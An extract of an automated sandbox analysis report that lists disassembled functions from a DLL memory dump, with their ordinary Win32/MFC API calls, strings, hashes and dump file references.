                                                                  • Instruction ID: 92d5ac3f3a95069edfa2914544a7dbf43607f7b68baf94b13a0b415714364e2c
                                                                  • Opcode Fuzzy Hash: 74607421bcf658d3c40ae11bd051381464889ea1f0a87e67c5db91af92cf72fa
                                                                  • Instruction Fuzzy Hash: FA11AC32650369FBDB248E44CD85F9A7778EB09B04F014919F60AE6480CBB1B841CB90
                                                                  Function 6C8C2ECA Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8C2EDF
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8C2EEC
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2EFF
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 6C8C2F21
                                                                  • SetCursor.USER32(?), ref: 6C8C2F3F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$ClientLoadRectScreen
                                                                  • String ID:
                                                                  • API String ID: 2747913190-0
                                                                  • Opcode ID: 7235b93082d1cf496928a43bd3e2a695fc0f4b5b6c99a383aefd83fda318918e
                                                                  • Instruction ID: 94f1ea8b3d7e124335c9f54ecfb04ab68c6fcb527acedd2df5aeeefa53dff96d
                                                                  • Opcode Fuzzy Hash: 7235b93082d1cf496928a43bd3e2a695fc0f4b5b6c99a383aefd83fda318918e
                                                                  • Instruction Fuzzy Hash: 70013975A0021EEFDF316FA9CD08DAE7FB8EF4935AB0085B5F409D2520EB7095119B61
                                                                  Function 6C8943B1 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 6C8943D6
                                                                  • PostMessageW.USER32(?,00000367,00000000,00000000), ref: 6C8943E6
                                                                  • GetCapture.USER32 ref: 6C8943EC
                                                                  • ReleaseCapture.USER32 ref: 6C8943F8
                                                                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C89441F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Message$CapturePost$PeekRelease
                                                                  • String ID:
                                                                  • API String ID: 1125932295-0
                                                                  • Opcode ID: 2b71e893bd5fefb2755af0223605e0f1ae4eb185ca1d28fec5de1e7cfa487de1
                                                                  • Instruction ID: 459eb90437b9bee5a42bb0af1adf92c7f46315b5ea9c22d737cf40d850564b7b
                                                                  • Opcode Fuzzy Hash: 2b71e893bd5fefb2755af0223605e0f1ae4eb185ca1d28fec5de1e7cfa487de1
                                                                  • Instruction Fuzzy Hash: 06018F31201711ABEB312B398D59E5B7ABCFBC5B4DF008929F55AD1551EB719802CA60
                                                                  Function 6C884A6F Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 6C884A7A
                                                                    • Part of subcall function 6C8A0891: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 6C8A08D8
                                                                    • Part of subcall function 6C8A0891: CreatePatternBrush.GDI32(00000000), ref: 6C8A08E5
                                                                    • Part of subcall function 6C8A0891: DeleteObject.GDI32(00000000), ref: 6C8A08F1
                                                                  • SelectObject.GDI32(?,?), ref: 6C884A99
                                                                  • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 6C884ABE
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C884ACC
                                                                  • ReleaseDC.USER32(?,?), ref: 6C884AD8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateSelect$BitmapBrushDeletePatternRelease
                                                                  • String ID:
                                                                  • API String ID: 2474928807-0
                                                                  • Opcode ID: fe220660f6fe127c2f7b7e014fff5bb33886cacdf704da6b814f66effa345cbb
                                                                  • Instruction ID: 55d26c670e9209ecd070d7b4a540316104c07d8dc5d2abd6f04919982af3a475
                                                                  • Opcode Fuzzy Hash: fe220660f6fe127c2f7b7e014fff5bb33886cacdf704da6b814f66effa345cbb
                                                                  • Instruction Fuzzy Hash: A5011A76200611AFCB25AFA9CE48C567FB9FF897483208568F51DC6921CB73D812DB64
                                                                  Function 6C89C58A Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89C591
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6C89C59C
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6C89C60A
                                                                    • Part of subcall function 6C89C493: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C89C4AB
                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 6C89C5B7
                                                                  • _Yarn.LIBCPMT ref: 6C89C5CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                  • String ID:
                                                                  • API String ID: 1088826258-0
                                                                  • Opcode ID: 4de0442620602df8a030d4760ca70143cf05a6ab1fcdfd1bb21243c78835891d
                                                                  • Instruction ID: 70ec1732836b939c0140bacc432df323a93f01ed2ed8418b9cd29d197cbcb9e8
                                                                  • Opcode Fuzzy Hash: 4de0442620602df8a030d4760ca70143cf05a6ab1fcdfd1bb21243c78835891d
                                                                  • Instruction Fuzzy Hash: B501F7717002169BCB1AEF28C9006BD7B71BF86244B548428D81167781DF75AE06CBC4
                                                                  Function 6C85E540 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 492COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: _strcspn
                                                                  • String ID: .$@
                                                                  • API String ID: 3709121408-1252397774
                                                                  • Opcode ID: 5b5c0aeb7539798b8cabc853dbfaffe544cf7e8d372c973811ded1e327be3f1f
                                                                  • Instruction ID: 9abc334ba8687da145c5c9b44670b8f5e7373459907644b61cb25161882631fa
                                                                  • Opcode Fuzzy Hash: 5b5c0aeb7539798b8cabc853dbfaffe544cf7e8d372c973811ded1e327be3f1f
                                                                  • Instruction Fuzzy Hash: 29324AB4904658CFCB65CF28C990ADDBBB1BF4A300F0085EAD849AB751DB749E94CF91
                                                                  Function 6C95E073 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C95E07D
                                                                    • Part of subcall function 6C95D1C2: __EH_prolog3.LIBCMT ref: 6C95D1C9
                                                                    • Part of subcall function 6C95D33F: __EH_prolog3.LIBCMT ref: 6C95D346
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3
                                                                  • String ID: DEFAULT$NORMAL$d
                                                                  • API String ID: 431132790-2951642190
                                                                  • Opcode ID: bd313a7e63aa8569b78fb2fc1f53ca477a5cc23d56d15f5cb474a07089648f09
                                                                  • Instruction ID: f28ca76cbc2e5d82ffa74e52cda197e9cc771bbfcfe64355b2b4782be9dca03e
                                                                  • Opcode Fuzzy Hash: bd313a7e63aa8569b78fb2fc1f53ca477a5cc23d56d15f5cb474a07089648f09
                                                                  • Instruction Fuzzy Hash: 9C8159B190126ADEDF14CFA8C951BEEBBB4BF11304F5044A9D418ABB50DB359A88CF60
                                                                  Function 6C8B0BA2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8B0BA9
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                    • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$Ctrl
                                                                  • String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$MFCToolBars
                                                                  • API String ID: 3879667756-2016111687
                                                                  • Opcode ID: 38cd27cff6d74fac42a900443c90563d4b1f2db8c07acd595f6b433e483b4935
                                                                  • Instruction ID: aeb06e20753b640f0a7a4d2b71fd4e1ec8394033f859a6d0bff77b209b62f803
                                                                  • Opcode Fuzzy Hash: 38cd27cff6d74fac42a900443c90563d4b1f2db8c07acd595f6b433e483b4935
                                                                  • Instruction Fuzzy Hash: 0021B471900219ABCF20DFA8CE94AFEB775BF45318F144D29E82177781EB70A905CBA0
                                                                  Function 6C8BCE17 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CursorH_prolog3
                                                                  • String ID: Control Panel\Desktop$MenuShowDelay
                                                                  • API String ID: 634316419-702829638
                                                                  • Opcode ID: 46d36e4a24d3fbd4acdb55b63b38324ebc420f02dc8e5745620e3a165ff54f10
                                                                  • Instruction ID: 73a036edc0ec74f304cd7b01e1bb819bd1ac6f99ccfd662adec46d4d461f7cd1
                                                                  • Opcode Fuzzy Hash: 46d36e4a24d3fbd4acdb55b63b38324ebc420f02dc8e5745620e3a165ff54f10
                                                                  • Instruction Fuzzy Hash: 2F214171B0021ACFDF18DF64C9549BE7771BB44318B244929E925EB781EB309D45CB94
                                                                  Function 6C8B0C80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8B0C87
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3
                                                                  • String ID: %TsMFCToolBarParameters$LargeIcons$MFCToolBars
                                                                  • API String ID: 431132790-953485693
                                                                  • Opcode ID: b1f9202482b9267346385b5cda8f2bed5af557de5b60f50303834edc7e464fd1
                                                                  • Instruction ID: b396186859d85eeac409e75deb0b7e3dbbdc8b8ca063febd2b5bf44e2ecc8507
                                                                  • Opcode Fuzzy Hash: b1f9202482b9267346385b5cda8f2bed5af557de5b60f50303834edc7e464fd1
                                                                  • Instruction Fuzzy Hash: CC214174A0031A9FDF14DFA8C994AEEB771BF54308F144979E4127B781EB34A909CBA1
                                                                  Function 6C8A03B9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C88A57B: LoadLibraryW.KERNEL32(00000000,6CA42418,00000010,6C8A03E4,comctl32.dll,?), ref: 6C88A5BC
                                                                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 6C8A03F8
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 6C8A0444
                                                                    • Part of subcall function 6C89FFF7: GetLastError.KERNEL32(6C8A03EF,comctl32.dll,?,?,00001000,?,?,?), ref: 6C89FFF7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressErrorFreeLastLoadProc
                                                                  • String ID: DllGetVersion$comctl32.dll
                                                                  • API String ID: 2540614322-3857068685
                                                                  • Opcode ID: 59d8359a1639d75bb09b0ede33bec2b93c2a67b50a5a76adb8929661bd8d26aa
                                                                  • Instruction ID: e80e86a7d9e39d19611847183396a75027158fa7e4120178f3bda53bf45238b9
                                                                  • Opcode Fuzzy Hash: 59d8359a1639d75bb09b0ede33bec2b93c2a67b50a5a76adb8929661bd8d26aa
                                                                  • Instruction Fuzzy Hash: DC110175A0121A9FCB209FA8C854BDE77F4BF85319F004428E906EB340DB34C9068BA2
                                                                  Function 6C89EFFA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89F001
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 6C89F025
                                                                  • GetClassInfoW.USER32(?,?,?), ref: 6C89F060
                                                                    • Part of subcall function 6C88F6D4: __EH_prolog3_catch.LIBCMT ref: 6C88F6DB
                                                                    • Part of subcall function 6C88F6D4: GetClassInfoW.USER32(?,?,?), ref: 6C88F6ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClassInfo$CursorH_prolog3H_prolog3_catchLoad
                                                                  • String ID: %Ts:%x:%x:%x:%x
                                                                  • API String ID: 937286869-4057404147
                                                                  • Opcode ID: 5f43086f97f3018b7dc1ce8fa31b6211dba99e4f2210610df86876d529b9d8a5
                                                                  • Instruction ID: 08502802dda03a0064a73371e34c2efb2ad630e03345487903388b37e1abf3fa
                                                                  • Opcode Fuzzy Hash: 5f43086f97f3018b7dc1ce8fa31b6211dba99e4f2210610df86876d529b9d8a5
                                                                  • Instruction Fuzzy Hash: 15212EB1E00219AFDB60DFADC984BDEBAF4BF18308F108829E508E7740D77499458B95
                                                                  Function 6C89A54A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,80070057), ref: 6C89A55B
                                                                  • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 6C89A56B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                  • API String ID: 1646373207-2994018265
                                                                  • Opcode ID: 6863dbe00bd7036c520e3b0aecf6ce765845a1c6929e6f3b87a1782c79753be9
                                                                  • Instruction ID: 15d13da245a1ac3d169bb0b39fcc32515cb458705a4308f0200b513f32958029
                                                                  • Opcode Fuzzy Hash: 6863dbe00bd7036c520e3b0aecf6ce765845a1c6929e6f3b87a1782c79753be9
                                                                  • Instruction Fuzzy Hash: B601AD32300209AFCF221F98CD08BDA3BB6FB89356F108425FA59D1420D772C862DB50
                                                                  Function 6C8A0147 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 6C8A0162
                                                                  • GetClassNameW.USER32(?,?,0000000A), ref: 6C8A0177
                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,?,?,?,?,?,?,6C8879A6), ref: 6C8A018E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClassCompareLongNameStringWindow
                                                                  • String ID: combobox
                                                                  • API String ID: 1414938635-2240613097
                                                                  • Opcode ID: 71a431969d7baf00873723d3a0757b45b2147a0adebd0f7a4f4e42f65d89bf0b
                                                                  • Instruction ID: ab41e7ffdcc1ddca79c1d95cdeab95c45ffc9eb6473fc3cf9509985fc7e0ccc1
                                                                  • Opcode Fuzzy Hash: 71a431969d7baf00873723d3a0757b45b2147a0adebd0f7a4f4e42f65d89bf0b
                                                                  • Instruction Fuzzy Hash: DEF0A431655229AFCB10EFA8CD55EEE77B8AB06724F504715F526E61C0CB20A5068691
                                                                  Function 6C89A5BA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 6C89A5CB
                                                                  • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C89A5DB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
